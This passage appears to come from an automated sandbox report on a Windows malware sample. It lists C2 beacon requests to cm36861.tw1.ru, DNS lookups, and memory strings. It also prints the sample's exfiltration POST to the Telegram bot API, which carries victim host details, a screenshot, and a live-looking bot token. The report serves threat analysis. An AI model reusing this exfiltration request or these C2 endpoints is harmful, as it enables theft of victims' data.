Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ru
Source: global traffic	HTTP traffic detected: GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNlW6xWbjdnSYpFM1clUnFEVNdWTzQmdS1mYwRGbJZTSpNGbaxmYwRGbJNHMulkdkdVWqx2RhRUOTllas12YsFzVRl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJl3YsJFWZBjTGl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETplFRNBzZqx0MrRFTzVlaOdXQqxEeNpWS2kUeZZHetl0cJlXVWpUaPl2auNGM1cFZ25UbJNXS5NGaohlWVpUaPlGNyIGckdlW5p0QMlGNXpFb4dkYwR3aJZTSTVGMsJTWpdXaJh3Yqx0dVpWT1FFVOlHN510MFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpVlaOVTQE50dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIGZ5UDO2EWOlRWOjV2N1IGN5kTO2MTZmF2Y3UzNiVWOiwiI5gTYiJmNlVWMlRDNlNDZ4cTMhZmYjVmZhZTNlhjM0UWZ5kDM1EGZyIiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: cm36861.tw1.ruConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cm36861.tw1.ru
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b040e0acd70ade6f5665d2ebc227f233d835d%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20040965%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20173.254.250.71%0A%E2%80%A2%20GEO%3A%20US%20%2F%20Dallas%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CdLErkomWRcaRguaKAMtYMnt.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf417d74c5912Host: api.telegram.orgContent-Length: 669245Expect: 100-continueConnection: Keep-Alive

Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cm36861.tw1.ru
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cm36861.tw1.ru/
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000027CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cm36861.tw1.ru/2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d528
Source: powershell.exe, 00000016.00000002.3376842814.00000205704C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.a1.0/auj
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ad0/g/imj
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobt/pg/j
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3624828195.000000001CC19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.photo/j
Source: powershell.exe, 00000011.00000002.3094117080.000002A2C909D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.3046812715.000001DB2A1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3107519937.0000028E5E320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2244941047.000002A2B91B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020558158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: kQyd2z80gD.exe, 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2244941047.000002A2B8F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020557F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136C02000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.2244941047.000002A2B91B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A3A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E4D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020558158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.3368189544.00000206ED542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coG
Source: powershell.exe, 00000016.00000002.3369230772.0000020570453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.AppV.UG
Source: powershell.exe, 00000011.00000002.2244941047.000002A2B8F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2243755724.000001DB1A181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2244948094.0000028E4E2B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2250434274.0000020557F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241815958.0000020680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2245302870.000001B136C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https:/
Source: powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.2245302870.000001B136E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.3108452537.0000020567FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.microsof
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.i
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/json8
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/miss
